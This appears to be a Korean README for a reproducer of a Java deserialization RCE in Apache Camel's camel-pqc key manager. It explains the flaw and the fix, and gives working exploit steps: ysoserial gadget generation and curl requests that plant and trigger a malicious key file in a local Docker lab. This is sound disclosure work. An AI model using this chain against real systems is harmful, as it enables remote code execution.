
CVE-2026-40048 재현기: Apache Camel camel-pqc FileBasedKeyLifecycleManager 안전하지 않은 역직렬화 (RCE)
이 프로젝트는 Apache Camel의 camel-pqc 컴포넌트에서 CVE-2026-40048로 추적되는 Java 역직렬화 취약점을 시연합니다. FileBasedKeyLifecycleManager는 구성된 키 디렉터리에서 <keyId>.key 파일을 ObjectInputFilter 없이 원시 ObjectInputStream으로 읽으므로, 해당 디렉터리에 쓰기 권한이 있는 공격자는 원격 코드 실행을 달성할 수 있습니다.
보안 권고: https://camel.apache.org/security/CVE-2026-40048.html
| Property | Value |
|---|---|
| 구성 요소 | camel-pqc |
| 영향받는 클래스 | org.apache.camel.component.pqc.lifecycle.FileBasedKeyLifecycleManager (getKey) |
| CWE | CWE-502: 신뢰할 수 없는 데이터의 역직렬화 |
| 영향 | 원격 코드 실행 (RCE) |
| 영향받는 버전 | 4.18.0 이상 4.18.2 미만, 4.19.0 이상 4.20.0 미만 |
| 수정된 버전 | 4.18.2, 4.20.0 |
| JIRA | CAMEL-23200 |
| 신고자 | Andrea Cosentino (ASF), Venkatraman Kumar (Securin) |
FileBasedKeyLifecycleManager는 양자 내성 키(post-quantum key)를 <keyDir>/<keyId>.key에 직렬화된 Java 객체로 저장합니다. 키를 로드하면 해당 파일을 원시 ObjectInputStream으로 역직렬화하며, KeyPair로의 캐스팅은 readObject()가 반환된 후에만 발생합니다:
// FileBasedKeyLifecycleManager.getKey(keyId) - affected version
Path keyFile = getKeyFile(keyId); // keyDirectory.resolve(keyId + ".key")
try (ObjectInputStream ois = new ObjectInputStream(new BufferedInputStream(Files.newInputStream(keyFile)))) {
KeyPair keyPair = (KeyPair) ois.readObject(); // NO ObjectInputFilter — gadget runs before the cast
...
}
키 디렉터리에 쓰기 권한이 있는 공격자는 경로 탐색(path traversal), 잘못 구성된 볼륨 권한, 손상된 키 프로비저닝 파이프라인, 또는 심볼릭 링크 공격을 통해 정상적인 키 수명 주기 로드 중에 실행되는 악의적으로 조작된 직렬화 객체를 심을 수 있습니다.
mvn clean package -DskipTests
docker compose up -d --build
wget https://github.com/frohoff/ysoserial/releases/download/v0.0.6/ysoserial-all.jar
# Benign proof: create /tmp/pwned. On JDK 21 add --add-opens to generate CC gadgets:
java --add-opens java.base/java.util=ALL-UNNAMED --add-opens java.base/java.lang=ALL-UNNAMED \
--add-opens java.base/java.lang.reflect=ALL-UNNAMED \
-jar ysoserial-all.jar CommonsCollections7 "touch /tmp/pwned" | base64 -w0 > payload.b64
<keyId>.key로 설치curl -X POST http://localhost:8080/exploit/inject \
-H "Content-Type: text/plain" --data-binary @payload.b64
# writes the bytes to /tmp/pqc-keys/mykey.key inside the container
curl http://localhost:8080/exploit/trigger
# getKey("mykey") -> ObjectInputStream.readObject() -> gadget executes
# -> ">>> RCE proof — /tmp/pwned exists: true"
docker exec cve-2026-40048 ls -la /tmp/pwned
docker compose down
getKey()는 정상적인 키 수명 주기 작업(서명/검증 키 검색, 교체 확인 등) 중에 호출되므로, 공격자가 설치한 <keyId>.key를 로드하면 역직렬화가 트리거됩니다.
FileBasedKeyLifecycleManager가 사용하는 키 디렉터리에 대한 쓰기 권한 (공유/잘못 구성된 볼륨, 경로 탐색, 손상된 프로비저닝, 심볼릭 링크).commons-collections:3.2.1).ObjectInputStream-in-key-store 패턴은 이후 더 광범위하게 해결되었습니다:
4.18.2 / 4.20.0으로 업그레이드하십시오. 이 수정 사항은 ObjectInputStream 기반 저장을 표준 PKCS#8(개인 키) / X.509 SubjectPublicKeyInfo(공개 키) Base64 JSON 인코딩으로 대체합니다.
업그레이드할 때까지:
CVE-2026-40048/
├── pom.xml
├── Dockerfile
├── docker-compose.yml
├── README.md
└── src/main/
├── java/com/example/
│ ├── Application.java
│ └── ExploitController.java # /inject (plant .key), /trigger (getKey -> RCE), /cleanup
└── resources/
└── application.properties
이 재현기는 공개적으로 공개되고 수정된 취약점에 대한 보안 연구 및 승인된 테스트 전용으로 제공됩니다. 명시적 허가 없이 시스템에 사용하지 마십시오.